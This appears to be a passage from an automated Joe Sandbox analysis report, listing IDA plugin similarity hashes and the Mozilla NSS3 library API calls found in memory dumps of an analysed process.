                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 287051776-0
                                                                                                                                                                                                                                                      • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                      • Instruction ID: 8682b2fc8d0834e62865409b8ed5583c8029c3b12f2c589c8e67cbe18bafb401
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA31E1715031018BE730C659DC48FBFB265EB80319F64097AD62997AD0EF31D88AD665
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,6C470A2C), ref: 6C470E0F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C470A2C), ref: 6C470E73
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C470A2C), ref: 6C470E85
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C470A2C), ref: 6C470E90
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C470EC4
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C470A2C), ref: 6C470ED9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3618544408-0
                                                                                                                                                                                                                                                      • Opcode ID: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                                                      • Instruction ID: aaab6deb05cf1f27de5f81ae12faad1ec30d3399fbeda5048973e983c46ac478
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC212E72E0228457EB30C5665C45FEF72AEDBC1649F194035D81867B42EB62D81582F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47AEB3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C47AECA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47AEDD
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C47AF02
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C599500), ref: 6C47AF23
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47AF37
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3714604333-0
                                                                                                                                                                                                                                                      • Opcode ID: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                                                      • Instruction ID: 20fdc0824170a401db236edcbb287b091fab19a9af12f6a45205b45adc2dd042
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE2128729092009BEB20CE189C01F9A7BA4AF85728F144319EC589B791E732D90587B7
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(FA71756D,?), ref: 6C4FEEAE
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4FEEC5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • htonl.WSOCK32(?), ref: 6C4FEEE3
                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?), ref: 6C4FEEED
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C4FEF01
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1351805024-0
                                                                                                                                                                                                                                                      • Opcode ID: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                                                      • Instruction ID: 1302c93ff6b1680c7aef7fe43cc51715aa8d106401f163ad40432445739cef57
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21B131A00224ABDB10DF28DC84F9A77A4EF85359F158129EC299B741E330ED16CBE6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C477F68
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C477F7B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477FA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59919C,?), ref: 6C477FBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477FCA
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C59915C,00000014), ref: 6C477FFE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1489184013-0
                                                                                                                                                                                                                                                      • Opcode ID: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                                                      • Instruction ID: 02a647034d3a15237846ff093a676da9453b046391db2a91415908ce3a02ff0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B11121B1E042046AF720EA25AE50FBB76B8DF4465CF40062DEC59D2B81F720A948C2F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,6C4FDC29,?), ref: 6C47BE64
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C4FDC29,?), ref: 6C47BE78
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C4FDC29,?), ref: 6C47BE96
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C4FDC29,?), ref: 6C47BEBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6C4FDC29,?), ref: 6C47BEDF
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C4FDC29,?), ref: 6C47BEF3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3111646008-0
                                                                                                                                                                                                                                                      • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                      • Instruction ID: b0811d20015fc1c628524bf971bcb1ecee4f7e14a2e3aa950b8a0cc3e997aafb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11A272E012055BEB10DB659D55FAA3BA8EB41259F154028ED09EBB80EB31E909C7F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B985B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C4B9871
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C59D9B0,?), ref: 6C4B98A2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CE245
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4CE254
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4B98B7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4B9901
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4B9910
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2561846027-0
                                                                                                                                                                                                                                                      • Opcode ID: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                                                      • Instruction ID: 70068e6b0163237e3f40caaa0eafbf4ddc911de95a7084ff705232e9ddfeda8c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C110272A0124477FF00DE609C81FAA3A78AB653A9F150224FD1869791E773D8A483A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C503D3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_NewArena_Util.NSS3(00000800,6C503CAF,?), ref: 6C47BABF
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C503CAF,?), ref: 6C47BAD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C503CAF,?), ref: 6C47BB08
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C503CAF,?), ref: 6C47BB1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C503CAF,?), ref: 6C47BB3B
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503CCB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503CE2
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C503CF8
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503D15
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503D2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4030862364-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
